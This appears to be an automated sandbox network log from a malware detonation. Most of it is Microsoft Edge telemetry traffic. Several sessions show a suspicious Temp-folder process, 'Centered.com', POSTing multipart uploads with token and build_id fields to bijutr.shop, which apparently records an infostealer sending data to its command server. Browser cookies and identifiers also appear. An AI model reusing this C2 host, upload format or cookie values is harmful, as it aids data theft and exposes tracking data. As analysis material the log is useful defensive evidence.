                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:47 UTC5219OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 38 3a 30 35 3a 34 34 2e 38 31 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 31 38 38 30 30 33 66 2d 32 39 36 30 2d 34 62 64 31 2d 61 38 32 65 2d 34 30 66 36 63 38 31 62 61 39 63 36 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 32 32 36 38 30 30 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T08:05:44.810Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"8188003f-2960-4bd1-a82e-40f6c81ba9c6","epoch":"342268007"},"app":{"locale"
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:48 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=1056d7a641db46cebb3a61c9797249ac&HASH=1056&LV=202412&V=4&LU=1735279848293; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=888311c736d8493581a45128611e51c2; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      time-delta-millis: -6896517
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:48 GMT
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      43192.168.2.74992851.104.15.2534432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:48 UTC1060OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735286745671&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 5417
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:48 UTC5417OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 38 3a 30 35 3a 34 35 2e 36 37 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 31 38 38 30 30 33 66 2d 32 39 36 30 2d 34 62 64 31 2d 61 38 32 65 2d 34 30 66 36 63 38 31 62 61 39 63 36 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 32 32 36 38 30 30 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T08:05:45.670Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"8188003f-2960-4bd1-a82e-40f6c81ba9c6","epoch":"342268007"},"app":{"locale"
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:49 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=fd2824251c744b43aabf794576f16519&HASH=fd28&LV=202412&V=4&LU=1735279849108; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=090977ea8b09442fa4b741a1d8e33004; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      time-delta-millis: -6896563
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:48 GMT
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      44192.168.2.74992951.104.15.2534432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:49 UTC1060OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735286745807&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 9876
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:49 UTC9876OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 38 3a 30 35 3a 34 35 2e 38 30 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 31 38 38 30 30 33 66 2d 32 39 36 30 2d 34 62 64 31 2d 61 38 32 65 2d 34 30 66 36 63 38 31 62 61 39 63 36 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 32 32 36 38 30 30 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-27T08:05:45.806Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"8188003f-2960-4bd1-a82e-40f6c81ba9c6","epoch":"342268007"},"app":{"loca
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:49 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=88d64f4411624d41bda350c8fe3cfea7&HASH=88d6&LV=202412&V=4&LU=1735279849239; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=a50e063031b443418544eb9c36d0e64d; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      time-delta-millis: -6896568
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:48 GMT
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      45192.168.2.749932188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:50 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----5FCTR1D2DTRQQIMGVASJ
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 6989
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:50 UTC6989OUTData Raw: 2d 2d 2d 2d 2d 2d 35 46 43 54 52 31 44 32 44 54 52 51 51 49 4d 47 56 41 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 35 46 43 54 52 31 44 32 44 54 52 51 51 49 4d 47 56 41 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 35 46 43 54 52 31 44 32 44 54 52 51 51 49 4d 47 56 41 53 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------5FCTR1D2DTRQQIMGVASJContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------5FCTR1D2DTRQQIMGVASJContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------5FCTR1D2DTRQQIMGVASJCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:51 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      46192.168.2.749938188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:59 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----9ZCBA1NYM7GV3E3OH47G
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 32481
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:59 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 39 5a 43 42 41 31 4e 59 4d 37 47 56 33 45 33 4f 48 34 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 43 42 41 31 4e 59 4d 37 47 56 33 45 33 4f 48 34 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 43 42 41 31 4e 59 4d 37 47 56 33 45 33 4f 48 34 37 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------9ZCBA1NYM7GV3E3OH47GContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------9ZCBA1NYM7GV3E3OH47GContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------9ZCBA1NYM7GV3E3OH47GCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:59 UTC16126OUTData Raw: 46 73 61 58 70 6c 51 32 46 73 62 47 4a 68 59 32 74 42 63 6e 4a 68 65 51 41 41 56 51 42 58 5a 48 4e 54 5a 58 52 31 63 45 78 76 5a 30 31 6c 63 33 4e 68 5a 32 56 58 41 46 59 41 56 32 52 7a 55 33 56 69 63 32 4e 79 61 57 4a 6c 52 58 67 41 41 41 4d 41 51 32 39 75 63 33 52 79 64 57 4e 30 55 47 46 79 64 47 6c 68 62 45 31 7a 5a 31 5a 58 41 41 51 41 51 33 56 79 63 6d 56 75 64 45 6c 51 41 46 64 45 55 30 4e 50 55 6b 55 75 5a 47 78 73 41 47 34 45 55 6e 52 73 53 57 35 70 64 46 56 75 61 57 4e 76 5a 47 56 54 64 48 4a 70 62 6d 63 41 41 4a 38 42 54 6e 52 50 63 47 56 75 52 6d 6c 73 5a 51 41 41 62 6e 52 6b 62 47 77 75 5a 47 78 73 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: FsaXplQ2FsbGJhY2tBcnJheQAAVQBXZHNTZXR1cExvZ01lc3NhZ2VXAFYAV2RzU3Vic2NyaWJlRXgAAAMAQ29uc3RydWN0UGFydGlhbE1zZ1ZXAAQAQ3VycmVudElQAFdEU0NPUkUuZGxsAG4EUnRsSW5pdFVuaWNvZGVTdHJpbmcAAJ8BTnRPcGVuRmlsZQAAbnRkbGwuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:00 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      47192.168.2.749940188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:00 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----890R9H47QQ9RQIE3EUKX
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 4421
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:00 UTC4421OUTData Raw: 2d 2d 2d 2d 2d 2d 38 39 30 52 39 48 34 37 51 51 39 52 51 49 45 33 45 55 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 38 39 30 52 39 48 34 37 51 51 39 52 51 49 45 33 45 55 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 38 39 30 52 39 48 34 37 51 51 39 52 51 49 45 33 45 55 4b 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------890R9H47QQ9RQIE3EUKXContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------890R9H47QQ9RQIE3EUKXContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------890R9H47QQ9RQIE3EUKXCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:01 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      48192.168.2.749942188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:02 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JWB1NYCJM7G4EUKNOHVA
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 4421
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:02 UTC4421OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 57 42 31 4e 59 43 4a 4d 37 47 34 45 55 4b 4e 4f 48 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 42 31 4e 59 43 4a 4d 37 47 34 45 55 4b 4e 4f 48 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 42 31 4e 59 43 4a 4d 37 47 34 45 55 4b 4e 4f 48 56 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------JWB1NYCJM7G4EUKNOHVAContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------JWB1NYCJM7G4EUKNOHVAContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------JWB1NYCJM7G4EUKNOHVACont
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:03 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


